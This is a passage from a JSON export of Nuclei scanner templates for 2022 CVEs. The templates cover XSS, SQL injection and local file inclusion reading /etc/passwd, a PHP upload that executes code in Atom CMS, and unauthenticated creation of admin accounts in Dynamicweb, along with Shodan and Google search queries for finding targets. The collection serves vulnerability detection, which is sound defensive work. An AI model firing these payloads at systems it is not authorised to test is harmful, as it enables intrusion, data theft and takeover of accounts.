5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084d1" }, "name": "CVE-2022-25323.yaml", "content": "id: CVE-2022-25323\n\ninfo:\n name: ZEROF Web Server 2.0 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: ZEROF Web Server 2.0 allows /admin.back cross-site scripting.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in ZEROF Web Server 2.0.\n reference:\n - https://github.com/awillix/research/blob/main/cve/CVE-2022-25323.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-25323\n - https://awillix.ru\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/awillix/research\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-25323\n cwe-id: CWE-79\n 
epss-score: 0.00115\n epss-percentile: 0.45093\n cpe: cpe:2.3:a:zerof:web_server:2.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zerof\n product: web_server\n tags: cve,cve2022,xss,zerof\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin.back<img%20src=x%20onerror=alert(document.domain)>\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'back<img src=x onerror=alert(document.domain)>'\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 401\n# digest: 4a0a00473045022100e86147269d500eee87a76dc8b3d4d6b539f23c5c25293ad044322e223159453702203e3e862ec74768390d0b5445cfb478c43678e1e7109cd2e1d3f97e9bb17fdd90:922c64590222798bb761d5b6d8e72950", "hash": "e1e8d43edd26c3bdbbb3fd821e645e4f", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084d2" }, "name": "CVE-2022-2535.yaml", "content": "id: CVE-2022-2535\n\ninfo:\n name: SearchWP Live Ajax Search < 1.6.2 - Unauthenticated Arbitrary Post Title Disclosure\n author: r3Y3r53\n severity: medium\n description: |\n The plugin does not ensure that users making a live search 
are limited to published posts only, allowing unauthenticated users to make a crafted query disclosing private/draft/pending post titles along with their permalink\n remediation: Fixed in version 1.6.2\n reference:\n - https://wpscan.com/vulnerability/0e13c375-044c-4c2e-ab8e-48cb89d90d02\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2535\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2022-2535\n cwe-id: CWE-639\n epss-score: 0.00198\n epss-percentile: 0.56687\n cpe: cpe:2.3:a:searchwp:searchwp_live_ajax_search:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: searchwp\n product: searchwp_live_ajax_search\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/searchwp-live-ajax-search/\"\n tags: cve,cve2022,wp,wp-plugin,wordpress,wpscan,searchwp-live-ajax-search,searchwp\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=draft\"\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"searchwp-live-search-result\")'\n condition: and\n# digest: 4a0a0047304502205c29befeae02b026b93a42c98ea54d1b6f5efaa102360055dbea4e7481f39b2f022100ad34ac1dc40f5d04fff554cad7674c9ca60fdd3db66a66b792e9e79ff14bca98:922c64590222798bb761d5b6d8e72950", "hash": "2933a283d8e383942b28ce9c10766e40", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084d3" }, "name": "CVE-2022-25356.yaml", "content": "id: CVE-2022-25356\n\ninfo:\n name: Alt-n/MDaemon Security Gateway <=8.5.0 - XML Injection\n author: Akincibor\n severity: medium\n description: |\n Alt-n/MDaemon Security Gateway through 8.5.0 is susceptible to XML injection via SecurityGateway.dll?view=login. An attacker can inject an arbitrary XML argument by adding a new parameter in the HTTP request URL. 
As a result, the XML parser fails the validation process and discloses information such as protection used (2FA), admin email, and product registration keys.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious XML code, leading to various security risks such as information disclosure, privilege escalation.\n remediation: |\n Upgrade Alt-n/MDaemon Security Gateway to version 8.5.1 or later to mitigate this vulnerability.\n reference:\n - https://www.swascan.com/security-advisory-alt-n-security-gateway/\n - https://www.altn.com/Products/SecurityGateway-Email-Firewall/\n - https://www.swascan.com/security-blog/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-25356\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2022-25356\n cwe-id: CWE-91\n epss-score: 0.00425\n epss-percentile: 0.73853\n cpe: cpe:2.3:a:altn:securitygateway:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: altn\n product: securitygateway\n google-query: inurl:\"/SecurityGateway.dll\"\n tags: cve,cve2022,altn,gateway,xml,injection\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/SecurityGateway.dll?view=login&redirect=true&9OW4L7RSDY=1'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Exception: Error while [Loading XML\"\n - \"<RegKey>\"\n - \"<IsAdmin>\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502207eaf7f3b8339b01fbf9d09efa0a1c48df53a4c44ce469786dd22d682531bb04d022100b158dfc406ffdb342ad75451f95e9b78f8fa9072ec60c97cfcb702e67a2736f7:922c64590222798bb761d5b6d8e72950", "hash": "97316cc8dd1f5b5697d31db31ac15b79", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084d4" }, "name": "CVE-2022-25369.yaml", "content": "id: CVE-2022-25369\n\ninfo:\n name: Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin User Creation\n author: 
pdteam\n severity: critical\n description: Dynamicweb contains a vulnerability which allows an unauthenticated attacker to create a new administrative user. Running this template creates a real administrative account with a random username and password on the target, so use it only with authorization and delete the account afterwards.\n remediation: 'Upgrade to one of the fixed versions or higher: Dynamicweb 9.5.9, 9.6.16, 9.7.8, 9.8.11, 9.9, 9.10.18, 9.12.8, or 9.13.0.'\n reference:\n - https://blog.assetnote.io/2022/02/20/logicflaw-dynamicweb-rce/\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25369\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-25369\n cwe-id: CWE-425\n metadata:\n max-request: 1\n shodan-query: http.component:\"Dynamicweb\"\n tags: cve2022,cve,dynamicweb,rce,unauth,intrusive\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}&adminemail=test@test.com&adminname=test\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"Success\": true'\n - '\"Success\":true'\n condition: or\n\n - type: word\n part: header\n words:\n - 'application/json'\n - 'ASP.NET_SessionId'\n condition: and\n case-insensitive: true\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b7f35452dbfcd48834f3400c73dcf201cc3872265ccf60c523480c1d6cee56fd02202c82c05a62a41f20bff8ca897e0fbf249b14b87a0da1aa8d03aebb40c626803d:922c64590222798bb761d5b6d8e72950", "hash": "520854514d9509f3a766c09917e206ca", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084d5" }, "name": "CVE-2022-2544.yaml", "content": "id: CVE-2022-2544\n\ninfo:\n name: WordPress Ninja Job Board < 1.3.3 - Direct Request\n author: tess\n severity: high\n description: WordPress Ninja Job Board plugin prior to 1.3.3 is susceptible to a direct request vulnerability. 
The plugin does not protect the directory where it stores uploaded resumes, making it vulnerable to unauthenticated directory listing which allows the download of uploaded resumes.\n impact: |\n An attacker can access sensitive files and potentially obtain sensitive information from the target system.\n remediation: |\n Update to the latest version of the WordPress Ninja Job Board plugin (1.3.3) to fix the vulnerability.\n reference:\n - https://plugins.trac.wordpress.org/changeset/2758420/ninja-job-board/trunk/includes/Classes/File/FileHandler.php?old=2126467&old_path=ninja-job-board%2Ftrunk%2Fincludes%2FClasses%2FFile%2FFileHandler.php\n - https://wpscan.com/vulnerability/a9bcc68c-eeda-4647-8463-e7e136733053\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2544\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2544\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-2544\n cwe-id: CWE-425\n epss-score: 0.00551\n epss-percentile: 0.7513\n cpe: cpe:2.3:a:wpmanageninja:ninja_job_board:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: wpmanageninja\n product: ninja_job_board\n framework: wordpress\n tags: cve2022,cve,ninja,exposure,wpscan,wordpress,wp-plugin,wp,wpmanageninja\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp/wp-content/uploads/wpjobboard/\"\n - \"{{BaseURL}}/wp-content/uploads/wpjobboard/\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Index of /wp/wp-content/uploads/wpjobboard\"\n - \"Index of /wp-content/uploads/wpjobboard\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100c3064d8709e47d8bc7b434502a27234fba508fca7c1339c6d99d091e98228c08022100d2289a0c1c442dc09404549115ed1975e200909c8473604550aa76083464a23d:922c64590222798bb761d5b6d8e72950", "hash": 
"aeb8aa4a4eb20fb7a3e1c9af49268a5c", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084d6" }, "name": "CVE-2022-2546.yaml", "content": "id: CVE-2022-2546\n\ninfo:\n name: WordPress All-in-One WP Migration <=7.62 - Cross-Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n WordPress All-in-One WP Migration plugin 7.62 and prior contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the target website, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of the WordPress All-in-One WP Migration plugin (7.63 or higher) to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/f84920e4-a1fe-47cf-9ba5-731989c70f58\n - https://wordpress.org/plugins/all-in-one-wp-migration/\n - https://patchstack.com/database/vulnerability/all-in-one-wp-migration/wordpress-all-in-one-wp-migration-plugin-7-62-unauthenticated-reflected-cross-site-scripting-xss-vulnerability\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2546\n - https://github.com/0xvinix/CVE-2022-2546\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 4.7\n cve-id: CVE-2022-2546\n cwe-id: CWE-79\n epss-score: 0.00252\n epss-percentile: 0.64447\n cpe: cpe:2.3:a:servmask:all-in-one_wp_migration:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: servmask\n product: all-in-one_wp_migration\n framework: wordpress\n tags: cve,cve2022,all-in-one-wp-migration,authenticated,wpscan,wordpress,wp-plugin,wp,xss,servmask\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: 
{{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=ai1wm_export HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bnew_value%5D%5B%5D=XSSPAYLOAD%3Csvg+onload=alert(document.domain)%3E&ai1wm_manual_export=1&secret_key={{secretkey}} HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - contains(header_3, \"text/html\")\n - status_code_3 == 200\n - contains(body_3, '{\\\"new_value\\\":[\\\"XSSPAYLOAD<svg onload=alert(document.domain)>')\n condition: and\n\n extractors:\n - type: regex\n name: secretkey\n group: 1\n regex:\n - 'ai1wm_feedback\"},\"secret_key\":\"([0-9a-zA-Z]+)\"'\n internal: true\n# digest: 4b0a00483046022100b7d06ce856a168a95b454d4325f60f812325ac99d80ba9a9b145c641a5457c16022100c7ea3daf3be143b3953ed74dea7edd703e5b7825a231fba31a84de3c93d919c6:922c64590222798bb761d5b6d8e72950", "hash": "e8ac9b345df361779d95928b48b8ec00", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084d7" }, "name": "CVE-2022-25481.yaml", "content": "id: CVE-2022-25481\n\ninfo:\n name: ThinkPHP 5.0.24 - Information Disclosure\n author: caon\n severity: high\n description: |\n ThinkPHP 5.0.24 is susceptible to information disclosure. This version was configured without the PATHINFO parameter. 
This can allow an attacker to access all system environment parameters from index.php, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to gain sensitive information.\n remediation: |\n Upgrade to a patched version of ThinkPHP or apply the necessary security patches.\n reference:\n - https://github.com/Lyther/VulnDiscover/blob/master/Web/ThinkPHP_InfoLeak.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-25481\n - https://github.com/20142995/sectool\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-25481\n cwe-id: CWE-668\n epss-score: 0.01261\n epss-percentile: 0.85321\n cpe: cpe:2.3:a:thinkphp:thinkphp:5.0.24:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: thinkphp\n product: thinkphp\n shodan-query: title:\"ThinkPHP\"\n tags: cve,cve2022,thinkphp,exposure,oss\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/index.php?s=example'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Exception\"\n - \"REQUEST_TIME\"\n - \"ThinkPHP Constants\"\n condition: and\n\n - type: status\n status:\n - 200\n - 500\n - 404\n condition: or\n# digest: 4a0a004730450220152a665e7b3a3c19077e3bf8a9d5f588afd66692737ed127dea8c823f9a1dd04022100d65ce7ec17220bbd6cfd2f3278886cd52b2f34beaae8509405bcfd1affd9940f:922c64590222798bb761d5b6d8e72950", "hash": "6d9918d27a51805fea78945d12dc3ca2", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084d8" }, "name": "CVE-2022-25485.yaml", "content": "id: CVE-2022-25485\n\ninfo:\n name: Cuppa CMS v1.0 - Local File Inclusion\n author: theamanrawat\n severity: high\n description: |\n CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertLightbox.php.\n 
impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.\n remediation: |\n Upgrade to the latest version of Cuppa CMS or apply the vendor-provided patch to fix the LFI vulnerability.\n reference:\n - https://github.com/CuppaCMS/CuppaCMS\n - https://nvd.nist.gov/vuln/detail/CVE-2022-25485\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n cvss-score: 7.8\n cve-id: CVE-2022-25485\n cwe-id: CWE-829\n epss-score: 0.00648\n epss-percentile: 0.78876\n cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: cuppacms\n product: cuppacms\n tags: cve,cve2022,lfi,cuppa,cuppacms\n\nhttp:\n - raw:\n - |\n POST /alerts/alertLightbox.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n url=../../../../../../../../../../../etc/passwd\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220695bf0015ba99c93acd63afca4128b2148ff5a27a7932b4643c859aeb61a42c4022044e70aebbbea707f05244a3f7616eaf4faf0449294f9689bcfc0fffc730fb702:922c64590222798bb761d5b6d8e72950", "hash": "2754ee4cd2633b2cb6ed016358ae7d8a", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084d9" }, "name": "CVE-2022-25486.yaml", "content": "id: CVE-2022-25486\n\ninfo:\n name: Cuppa CMS v1.0 - Local File Inclusion\n author: theamanrawat\n severity: high\n description: |\n CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertConfigField.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.\n remediation: |\n Upgrade to the latest version of Cuppa CMS or apply 
the provided patch to fix the LFI vulnerability.\n reference:\n - https://github.com/CuppaCMS/CuppaCMS\n - https://nvd.nist.gov/vuln/detail/CVE-2022-25486\n classification:\n cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n cvss-score: 7.8\n cve-id: CVE-2022-25486\n cwe-id: CWE-829\n epss-score: 0.01775\n epss-percentile: 0.8667\n cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: cuppacms\n product: cuppacms\n tags: cve,cve2022,lfi,cuppa,cuppacms\n\nhttp:\n - raw:\n - |\n POST /alerts/alertConfigField.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n urlConfig=../../../../../../../../../etc/passwd\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d9af1a8a2a7a6a3c65fffdd36d187033e9d8f9359c5ba7fbdf1c7e7522ab3a7c02200b66649c50c196fe79d3fd5010175cc3440562f4bb473c24296993c71c05f7d4:922c64590222798bb761d5b6d8e72950", "hash": "6c56aaf1894fd3ec0fcf3f46bac573ef", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084da" }, "name": "CVE-2022-25487.yaml", "content": "id: CVE-2022-25487\n\ninfo:\n name: Atom CMS v2.0 - Remote Code Execution\n author: theamanrawat\n severity: critical\n description: |\n Atom CMS v2.0 was discovered to contain a remote code execution (RCE) vulnerability via /admin/uploads.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: Fixed in version Atom CMS v2.1\n reference:\n - https://packetstormsecurity.com/files/166532/Atom-CMS-1.0.2-Shell-Upload.html\n - https://github.com/thedigicraft/Atom.CMS/issues/256\n - https://nvd.nist.gov/vuln/detail/CVE-2022-25487\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/shikari00007/Atom-CMS-2.0---File-Upload-Remote-Code-Execution-Un-Authenticated-POC\n 
classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-25487\n cwe-id: CWE-434\n epss-score: 0.84615\n epss-percentile: 0.98422\n cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: thedigitalcraft\n product: atomcms\n tags: cve2022,cve,rce,atom,cms,unauth,packetstorm,intrusive,thedigitalcraft\n\nhttp:\n - raw:\n - |\n POST /admin/uploads.php?id=1 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=---------------------------30623082103363803402542706041\n\n -----------------------------30623082103363803402542706041\n Content-Disposition: form-data; name=\"file\"\n\n\n -----------------------------30623082103363803402542706041\n Content-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\n Content-Type: image/jpeg\n\n\n <?php echo md5('CVE-2022-25487');?>\n -----------------------------30623082103363803402542706041--\n - |\n GET /uploads/{{filename}} HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 7ee3686858eb89dd68ccf85f0ea03abe\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: filename\n group: 1\n regex:\n - SET avatar = '(.*?)'\n internal: true\n# digest: 490a00463044022000a17e07fb463def6fed5b3cbdb6a2ecc52b4dd96ae6004e74061aa8dc3472d202200f9d0f7a19b2dd96dfed84ebd42d91c53587f4eeecc30d5a532882a5f35f94b1:922c64590222798bb761d5b6d8e72950", "hash": "d43e64b0601bbecee8887ad823c64c75", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084db" }, "name": "CVE-2022-25488.yaml", "content": "id: CVE-2022-25488\n\ninfo:\n name: Atom CMS v2.0 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n Atom CMS v2.0 was discovered to contain a SQL injection vulnerability via the id parameter in /admin/ajax/avatar.php.\n 
impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: Fixed in version Atom CMS v2.1\n reference:\n - https://github.com/thedigicraft/Atom.CMS/issues/257\n - https://nvd.nist.gov/vuln/detail/CVE-2022-25488\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/superlink996/chunqiuyunjingbachang\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-25488\n cwe-id: CWE-89\n epss-score: 0.0161\n epss-percentile: 0.87161\n cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: thedigitalcraft\n product: atomcms\n tags: cve,cve2022,sqli,atom,cms,thedigitalcraft\nvariables:\n num: \"999999999\"\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin/ajax/avatar.php?id=-1+union+select+md5({{num}})%23\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"/{{md5(num)}}\"\n - \"avatar-container\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100a73c8ca0b49194b5bc99ad324b86286411cb6049ef9f136a9fe942a263d7510202205b6306efb5f7d90e7308cce0f917fa4153db6c0fefd0f487f526ed0ce2b1ab04:922c64590222798bb761d5b6d8e72950", "hash": "a0e6287d3b85a2a655b77542db99f623", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084dc" }, "name": "CVE-2022-25489.yaml", "content": "id: CVE-2022-25489\n\ninfo:\n name: Atom CMS v2.0 - Cross-Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n Atom CMS v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the \"A\" parameter in /widgets/debug.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data 
theft, session hijacking, or defacement.\n remediation: Fixed in version Atom CMS v2.1\n reference:\n - https://github.com/thedigicraft/Atom.CMS/issues/258\n - https://nvd.nist.gov/vuln/detail/CVE-2022-25489\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-25489\n cwe-id: CWE-79\n epss-score: 0.00134\n epss-percentile: 0.47681\n cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: thedigitalcraft\n product: atomcms\n tags: cve,cve2022,xss,atom,cms,thedigitalcraft\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/widgets/debug.php?a=<script>alert(document.domain)</script>\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"<script>alert(document.domain)</script>\"\n - \"Path Array\"\n - \"console-debug\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ba616440a48cd79fed0fbb82c74d5b423c176fb2058b2a6e108042d3b7e3f6860220327a46e6573a290031f738c2c771cfdb4e8d33eafa4d6bacb46ae741a85abac2:922c64590222798bb761d5b6d8e72950", "hash": "bc4ba508b4420187aa2cd5d6ffc5d241", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084dd" }, "name": "CVE-2022-25497.yaml", "content": "id: CVE-2022-25497\n\ninfo:\n name: Cuppa CMS v1.0 - Local File Inclusion\n author: theamanrawat\n severity: medium\n description: |\n CuppaCMS v1.0 was discovered to contain an arbitrary file read via the copy function.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.\n remediation: |\n Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the LFI vulnerability.\n reference:\n - https://github.com/CuppaCMS/CuppaCMS\n - 
https://nvd.nist.gov/vuln/detail/CVE-2022-25497\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2022-25497\n cwe-id: CWE-552\n epss-score: 0.00508\n epss-percentile: 0.76089\n cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: cuppacms\n product: cuppacms\n tags: cve,cve2022,lfi,cuppa,intrusive,cuppacms\n\nhttp:\n - raw:\n - |\n POST /js/filemanager/api/index.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n {\"from\":\"//../../../../../../../../../../../../../etc/passwd\",\"to\":\"/../{{randstr}}.txt\",\"action\":\"copyFile\"}\n - |\n GET /{{randstr}}.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: header_2\n words:\n - text/plain\n\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402200e86958e748c94fb8894ce5d8e4ffb93f8142bb6942eda24333c6c89421e8ce00220055ccece3bbea309d872f93ae879a2c5d76a3cac9162862159898803a6a7f9bb:922c64590222798bb761d5b6d8e72950", "hash": "a0628fa9def8f103dc1c5ae9faa8969d", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084de" }, "name": "CVE-2022-2551.yaml", "content": "id: CVE-2022-2551\n\ninfo:\n name: WordPress Duplicator <1.4.7 - Authentication Bypass\n author: LRTK-CODER\n severity: high\n description: |\n WordPress Duplicator plugin before 1.4.7 is susceptible to authentication bypass. The plugin discloses the URL of the backup to unauthenticated visitors accessing the main installer endpoint. 
If the installer script has been run once by an administrator, this allows download of the full site backup without proper authentication.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or unauthorized actions on the affected WordPress site.\n remediation: Fixed in version 1.4.7.1.\n reference:\n - https://wpscan.com/vulnerability/f27d753e-861a-4d8d-9b9a-6c99a8a7ebe0\n - https://wordpress.org/plugins/duplicator/\n - https://github.com/SecuriTrust/CVEsLab/tree/main/CVE-2022-2551\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2551\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-2551\n cwe-id: CWE-425\n epss-score: 0.72442\n epss-percentile: 0.97997\n cpe: cpe:2.3:a:snapcreek:duplicator:*:*:*:*:lite:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: snapcreek\n product: duplicator\n framework: wordpress\n google-query: inurl:/backups-dup-lite/dup-installer/\n tags: cve2022,cve,wordpress,wp,wp-plugin,duplicator,wpscan,snapcreek\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/backups-dup-lite/dup-installer/main.installer.php?is_daws=1\"\n - \"{{BaseURL}}/wp-content/dup-installer/main.installer.php?is_daws=1\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"<a href='../installer.php'>restart this install process</a>\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022058b2345a7931d57a2c005b13d6444c706fd67511a9cfd652adc58a44381d1dd4022100a9b711eeffbbf37010a1f9ac104d9745baab70e7beb8354db4179e48762fd500:922c64590222798bb761d5b6d8e72950", "hash": 